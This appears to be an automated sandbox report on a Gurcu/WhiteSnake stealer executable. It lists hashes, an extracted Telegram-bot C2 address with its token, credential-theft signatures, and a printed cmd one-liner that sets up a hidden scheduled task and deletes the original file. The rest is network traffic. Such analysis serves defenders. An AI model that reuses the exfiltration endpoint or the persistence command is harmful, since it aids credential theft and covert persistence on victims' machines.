Resubmissions

10/04/2024, 02:28 UTC

240410-cyaxtsca43 10

10/04/2024, 02:28 UTC

240410-cx45aaca36 10

10/04/2024, 02:28 UTC

240410-cx4hrafc61 10

10/04/2024, 02:28 UTC

240410-cx37zsfc6y 10

14/10/2023, 01:16 UTC

231014-bm3ysshd6t 10

Analysis

  • max time kernel
    616s
  • max time network
    887s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64 arch:x86 image:win10-20240404-en locale:en-us os:windows10-1703-x64 system
  • submitted
    10/04/2024, 02:28 UTC

General

  • Target

    m1f1f3a069223072f8d6802a079235d.exe

  • Size

    306KB

  • MD5

    4b36dcaa94c3eca48a6292bd670ffe79

  • SHA1

    705484e61ac39ba02cc80903be0da6ce74333334

  • SHA256

    c2e57e9b6e52a5429ae7a7bd36c57f63589d78fbf0ffe5760ada4a67b9fadec9

  • SHA512

    cf07d7f80264554eb3b945421ca41db38ff79707775d355d478c09f4b64d14f523339295aa4bc9b79c0dbb004e6756585bcf85edc8cbc2d16f7f0481be93513a

  • SSDEEP

    3072:71E/yXS0m2pOVLVewP2D/kIyC+mvXi1QJIkjXAToknBq9tT/8RJ6W3t3dpdQGqKI:7E2mDMtqa5EOTeKXAllKD9bmTneefA

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6209822134:AAHQxD-CI1YDVcNbXijXHlonsEUgv3dfYtg/sendMessage?chat_id=-1001529292045

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Executes dropped EXE 2 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\m1f1f3a069223072f8d6802a079235d.exe
    "C:\Users\Admin\AppData\Local\Temp\m1f1f3a069223072f8d6802a079235d.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "m1f1f3a069223072f8d6802a079235d" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\m1f1f3a069223072f8d6802a079235d.exe" &&START "" "C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5036
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:4472
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:3760
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "m1f1f3a069223072f8d6802a079235d" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:4964
        • C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe
          "C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          PID:4588
    • C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe
      C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe
      1⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2220

Network

    • flag-us
      DNS
      eset.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      eset.com
      IN A
      Response
      eset.com
      IN A
      91.228.166.47
      eset.com
      IN A
      91.228.167.128
    • flag-us
      DNS
      archive.torproject.org
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      archive.torproject.org
      IN A
      Response
      archive.torproject.org
      IN CNAME
      archive-01.torproject.org
      archive-01.torproject.org
      IN A
      159.69.63.226
    • flag-us
      DNS
      blockchain.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      blockchain.com
      IN A
      Response
      blockchain.com
      IN A
      104.16.29.98
      blockchain.com
      IN A
      104.16.30.98
    • flag-us
      DNS
      openai.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      openai.com
      IN A
      Response
      openai.com
      IN A
      13.107.246.64
      openai.com
      IN A
      13.107.213.64
    • flag-sk
      POST
      http://eset.com/FMfO1hNIv5?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      91.228.166.47:80
      Request
      POST /FMfO1hNIv5?q=0 HTTP/1.1
      Host: eset.com
      Content-Length: 40
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Wed, 10 Apr 2024 02:29:14 GMT
      Content-Type: text/html
      Content-Length: 178
      Connection: close
      Location: https://www.eset.com/FMfO1hNIv5?q=0
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-de
      GET
      https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      159.69.63.226:443
      Request
      GET /tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz HTTP/1.1
      Host: archive.torproject.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Server: Apache
      X-Content-Type-Options: nosniff
      X-Frame-Options: sameorigin
      X-Xss-Protection: 1
      Referrer-Policy: no-referrer
      Strict-Transport-Security: max-age=15768000; preload
      Onion-Location: http://uy3qxvwzwoeztnellvvhxh7ju7kfvlsauka7avilcjg7domzxptbq7qd.onion/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
      Last-Modified: Thu, 16 Mar 2023 15:33:36 GMT
      ETag: "d42801-5f7062f2cbbbf"
      Accept-Ranges: bytes
      Content-Length: 13903873
      Cache-Control: max-age=2592000
      Expires: Fri, 10 May 2024 02:29:15 GMT
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-gzip
      Content-Language: en
    • flag-us
      GET
      http://blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.29.98:80
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Wed, 10 Apr 2024 03:29:15 GMT
      Location: https://www.blockchain.com/SrTg2TH7BH?q=4
      X-Content-Type-Options: nosniff
      Set-Cookie: _cfuvid=wQJ3bcqWFhJTFX_xvPnWd.HakPb7_LSz_wpFp6TRqOU-1712716155331-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly
      Server: cloudflare
      CF-RAY: 871f4ee2af16dd87-LHR
    • flag-us
      GET
      http://blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.29.98:80
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Wed, 10 Apr 2024 03:29:15 GMT
      Location: https://www.blockchain.com/SrTg2TH7BH?q=4
      X-Content-Type-Options: nosniff
      Set-Cookie: _cfuvid=OsNzR6JiJlkMzFwAYWgEdHvvzDLbl0YgxPM439zPDfY-1712716155344-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly
      Server: cloudflare
      CF-RAY: 871f4ee2cf6f93f3-LHR
    • flag-us
      GET
      http://blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.29.98:80
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: blockchain.com
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Wed, 10 Apr 2024 03:29:15 GMT
      Location: https://www.blockchain.com/SrTg2TH7BH?q=4
      X-Content-Type-Options: nosniff
      Set-Cookie: _cfuvid=SlMFp1cIMM65GTA1TUqchX89Pd2lD4tlTf6cOMvD_kI-1712716155401-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly
      Server: cloudflare
      CF-RAY: 871f4ee32fa093f3-LHR
    • flag-us
      POST
      http://openai.com/ifMwwwu7Vx?q=1
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      POST /ifMwwwu7Vx?q=1 HTTP/1.1
      Host: openai.com
      Content-Length: 206
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/ifMwwwu7Vx?q=1
      x-azure-ref: 20240410T022915Z-17585d9fd9cmlk4f6x27kadxrg00000006dg00000000fnn9
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T022915Z-17585d9fd9cmlk4f6x27kadxrg00000006dg00000000fnnt
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T022915Z-17585d9fd9cmlk4f6x27kadxrg00000006dg00000000fnnu
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T022915Z-17585d9fd9cmlk4f6x27kadxrg00000006dg00000000fnny
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T022916Z-17585d9fd9cmlk4f6x27kadxrg00000006dg00000000fnp2
      X-Cache: CONFIG_NOCACHE
    • flag-us
      DNS
      www.blockchain.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.blockchain.com
      IN A
      Response
      www.blockchain.com
      IN A
      104.16.30.98
      www.blockchain.com
      IN A
      104.16.29.98
    • flag-us
      POST
      https://openai.com/ifMwwwu7Vx?q=1
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      POST /ifMwwwu7Vx?q=1 HTTP/1.1
      Host: openai.com
      Content-Length: 206
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 405 Method Not Allowed
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Length: 0
      Connection: keep-alive
      Allow: GET, HEAD, OPTIONS
      x-azure-ref: 20240410T022915Z-174cb64fdd7dzw58t2r008535c00000001t0000000003bdx
      X-Cache: TCP_MISS
      cache-control: no-cache
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      x-azure-ref: 20240410T022915Z-174cb64fdd7dzw58t2r008535c00000001t0000000003be1
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      x-azure-ref: 20240410T022915Z-174cb64fdd7dzw58t2r008535c00000001t0000000003be3
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      x-azure-ref: 20240410T022916Z-174cb64fdd7dzw58t2r008535c00000001t0000000003be5
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://www.blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.30.98:443
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: www.blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      vary: Accept-Encoding
      x-blockchain-cp-b: blockchain-com
      x-blockchain-cp-f: bm9b 0.001 - 21f4dc4d1d8c733fd82cb011edf6380a
      x-blockchain-language: en
      x-blockchain-language-id: 0:0:0 (en:en:en)
      x-blockchain-server: BlockchainFE/1.0
      x-content-type-options: nosniff
      x-frame-options: SAMEORIGIN
      x-original-host: www.blockchain.com
      x-request-id: 21f4dc4d1d8c733fd82cb011edf6380a
      x-xss-protection: 1; mode=block
      CF-Cache-Status: HIT
      Age: 12
      Set-Cookie: _cfuvid=ytDdYRyIOtOXeMU8EIeYafGdBcjqW_RUJqkWH8FfIiE-1712716155720-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 871f4ee52aab385a-LHR
    • flag-us
      GET
      https://www.blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.30.98:443
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: www.blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      vary: Accept-Encoding
      x-blockchain-cp-b: blockchain-com
      x-blockchain-cp-f: bm9b 0.001 - 21f4dc4d1d8c733fd82cb011edf6380a
      x-blockchain-language: en
      x-blockchain-language-id: 0:0:0 (en:en:en)
      x-blockchain-server: BlockchainFE/1.0
      x-content-type-options: nosniff
      x-frame-options: SAMEORIGIN
      x-original-host: www.blockchain.com
      x-request-id: 21f4dc4d1d8c733fd82cb011edf6380a
      x-xss-protection: 1; mode=block
      CF-Cache-Status: HIT
      Age: 12
      Set-Cookie: _cfuvid=im5MYrGp6ndweg3mCCSb53MDOqA.mtC4A.4IH692nSM-1712716155729-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 871f4ee52f83643d-LHR
    • flag-us
      DNS
      www.eset.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.eset.com
      IN A
      Response
      www.eset.com
      IN CNAME
      www-eset-com.trafficmanager.net
      www-eset-com.trafficmanager.net
      IN CNAME
      www.eset.com.edgesuite.net
      www.eset.com.edgesuite.net
      IN CNAME
      a1281.dscr.akamai.net
      a1281.dscr.akamai.net
      IN A
      104.117.77.121
      a1281.dscr.akamai.net
      IN A
      104.117.77.144
    • flag-be
      GET
      https://www.eset.com/FMfO1hNIv5?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.121:443
      Request
      GET /FMfO1hNIv5?q=0 HTTP/1.1
      Host: www.eset.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: text/html
      Content-Length: 162
      Location: https://www.eset.com/FMfO1hNIv5/?q=0
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk 
https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: public, max-age=86400
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Connection: keep-alive
      Set-Cookie: TS01a40e5a=016c9a7a13ffd7ba7d4bca3a5bbaaf12430bb6fd06fabf6d78102aaddf8942faf9e93e233b48d6e25b175daa63b8111b18fcb01008; Path=/; Domain=.eset.com
    • flag-be
      GET
      https://www.eset.com/FMfO1hNIv5/?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.121:443
      Request
      GET /FMfO1hNIv5/?q=0 HTTP/1.1
      Host: www.eset.com
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: max-age=3554
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Connection: Transfer-Encoding
      Set-Cookie: TS01a40e5a=016c9a7a13d2ebe415b465c581718401f12c8beae165b8a1e1a2198863c0032db1693bc35e5de956b78c62d3a0b504e753a1b7202a; Path=/; Domain=.eset.com
    • flag-us
      DNS
      google.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      google.com
      IN A
      Response
      google.com
      IN A
      142.250.200.14
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T022915Z-17585d9fd9cj44z6bkvt57bsaw000000066g000000009mfr
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
